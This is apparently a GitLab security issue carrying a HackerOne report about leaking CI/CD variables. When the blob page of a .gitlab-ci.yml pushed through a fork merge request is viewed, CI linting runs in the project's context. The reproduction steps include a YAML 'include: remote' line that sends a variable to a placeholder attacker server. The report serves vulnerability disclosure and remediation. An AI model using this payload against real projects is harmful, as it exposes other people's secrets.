Skip to content

Backend: Leaking CI variables by visiting the blob page via fork MRs

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #1875515 by shells3c on 2023-02-15, assigned to @cmaxim:

Report | How To Reproduce

Report

SSOT

Refer to #417275 (closed)

Summary

When viewing the Gitlab CI configuration, Gitlab runs CI linting on the file content

app/models/blob_viewer/gitlab_ci_yml.rb

    def validation_message(opts)  
      return [@]validation_message if defined?([@]validation_message)

      prepare!

      [@]validation_message = Gitlab::Ci::Lint  
        .new(project: opts[:project], current_user: opts[:user], sha: opts[:sha])  
        .validate(blob.data).errors.first  
    end

The CI validation is run within the context of the viewed project, therefore project's CI variables can be used here. blob.data is the CI configuration content from a blob of the project and can be manipulated because even without Developer permission, I still can push a blob to the project by creating a merge request (commits of merge request will be fetched into the repository object pool). This allows me to run CI lint on the project without create_pipeline permission (the permission is checked in the CI lint API and GraphQL)

Steps to reproduce
  1. Create a project, create a CI variable in General > CI/CD > Variables, let say variable_x
  2. As the attacker, fork the project, and edit the CI configuration (.gitlab-ci.yml by default) with the following content (replace <ATTACKER SERVER>):
include:  
  remote: 'http://<ATTACKER SERVER>/${variable_x}.yaml
  1. Create a merge request with the previous change
  2. Now grab the commit SHA, visit this link and the variable will be sent to your server: https://gitlab.com/<victim>/<project>/-/blob/<sha>/.gitlab-ci.yml
Output of checks

This bug happens on GitLab.com

Impact

Unauthorized users can leak CI variables

Proposal

We are still discussing if it would make sense to disable CI Linter for external ref.

How To Reproduce

Please add reproducibility information to this section:

This page may contain information related to upcoming products, features and functionality. It is important to note that the information presented is for informational purposes only, so please do not rely on the information for purchasing or planning purposes. Just like with all projects, the items mentioned on the page are subject to change or delay, and the development, release, and timing of any products, features, or functionality remain at the sole discretion of GitLab Inc.

Edited by 🤖 GitLab Bot 🤖